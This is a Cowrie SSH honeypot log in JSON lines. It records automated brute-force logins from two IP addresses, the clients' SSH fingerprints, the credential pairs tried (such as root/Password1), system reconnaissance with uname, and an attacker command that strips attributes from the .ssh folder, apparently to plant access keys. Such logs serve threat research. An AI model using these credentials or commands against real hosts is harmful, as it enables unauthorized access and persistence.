{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:17:23.312671Z","src_ip":"212.227.235.229","session":"6a105fae2dae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49984,"dst_ip":"1.2.3.4","dst_port":22,"session":"263ef3d55a9a","protocol":"ssh","message":"New connection: 212.227.235.229:49984 (1.2.3.4:22) [session: 263ef3d55a9a]","sensor":"my-vps","timestamp":"2025-08-31T05:17:25.879358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:17:25.885476Z","src_ip":"212.227.235.229","session":"263ef3d55a9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:17:26.136874Z","src_ip":"212.227.235.229","session":"263ef3d55a9a"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:17:26.614978Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.login.failed","username":"willem","password":"willem","message":"login attempt [willem/willem] failed","sensor":"my-vps","timestamp":"2025-08-31T05:17:27.152820Z","src_ip":"212.227.235.229","session":"263ef3d55a9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:17:28.403883Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:17:28.404682Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:28.407742Z","src_ip":"212.227.235.229","session":"263ef3d55a9a"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:17:29.050027Z","src_ip":"212.227.235.229","session":"6a105fae2dae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:29.277239Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.session.closed","duration":"22.7","message":"Connection lost after 22.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:29.286796Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:30.785404Z","src_ip":"212.227.235.229","session":"6a105fae2dae"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:31.467903Z","src_ip":"212.227.125.160","session":"78f6cefc3201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34954,"dst_ip":"1.2.3.4","dst_port":22,"session":"b01e3adf1a8e","protocol":"ssh","message":"New connection: 212.227.235.229:34954 (1.2.3.4:22) [session: b01e3adf1a8e]","sensor":"my-vps","timestamp":"2025-08-31T05:17:33.102283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:17:33.820892Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:17:33.821579Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:17:39.732780Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34590,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad9cc0fa9a3f","protocol":"ssh","message":"New connection: 212.227.125.160:34590 (1.2.3.4:22) [session: ad9cc0fa9a3f]","sensor":"my-vps","timestamp":"2025-08-31T05:17:43.569002Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:17:43.819561Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:17:43.820224Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:17:44.041801Z","src_ip":"212.227.125.160","session":"ad9cc0fa9a3f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:17:44.043068Z","src_ip":"212.227.125.160","session":"ad9cc0fa9a3f"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:17:46.097491Z","src_ip":"212.227.125.160","session":"ad9cc0fa9a3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:46.267926Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:46.269012Z","src_ip":"212.227.235.229","session":"b01e3adf1a8e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:47.613745Z","src_ip":"212.227.125.160","session":"ad9cc0fa9a3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53276,"dst_ip":"1.2.3.4","dst_port":22,"session":"88bcd5d25b77","protocol":"ssh","message":"New connection: 212.227.125.160:53276 (1.2.3.4:22) [session: 88bcd5d25b77]","sensor":"my-vps","timestamp":"2025-08-31T05:17:50.309209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:17:54.070436Z","src_ip":"212.227.125.160","session":"88bcd5d25b77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:17:54.071194Z","src_ip":"212.227.125.160","session":"88bcd5d25b77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57066,"dst_ip":"1.2.3.4","dst_port":22,"session":"922d0835187b","protocol":"ssh","message":"New connection: 212.227.235.229:57066 (1.2.3.4:22) [session: 922d0835187b]","sensor":"my-vps","timestamp":"2025-08-31T05:18:08.019588Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47110,"dst_ip":"1.2.3.4","dst_port":22,"session":"98a2527326e8","protocol":"ssh","message":"New connection: 212.227.235.229:47110 (1.2.3.4:22) [session: 98a2527326e8]","sensor":"my-vps","timestamp":"2025-08-31T05:18:08.373469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:08.374212Z","src_ip":"212.227.235.229","session":"98a2527326e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:08.647615Z","src_ip":"212.227.235.229","session":"98a2527326e8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"112","message":"login attempt [admin/112] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:09.781413Z","src_ip":"212.227.235.229","session":"98a2527326e8"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:11.056011Z","src_ip":"212.227.235.229","session":"98a2527326e8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:18:16.992299Z","src_ip":"212.227.235.229","session":"922d0835187b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:18:16.993064Z","src_ip":"212.227.235.229","session":"922d0835187b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51096,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6c01c7d8ac","protocol":"ssh","message":"New connection: 212.227.235.229:51096 (1.2.3.4:22) [session: cb6c01c7d8ac]","sensor":"my-vps","timestamp":"2025-08-31T05:18:20.349376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:18:20.693096Z","src_ip":"212.227.235.229","session":"cb6c01c7d8ac"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:18:20.694563Z","src_ip":"212.227.235.229","session":"cb6c01c7d8ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41058,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ee421f8096f","protocol":"ssh","message":"New connection: 212.227.235.229:41058 (1.2.3.4:22) [session: 1ee421f8096f]","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.089098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.090310Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.172421Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.login.success","username":"root","password":"notes","message":"login attempt [root/notes] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.502423Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:18:23.683535Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.684265Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.685508Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.769381Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:18:23.991765Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
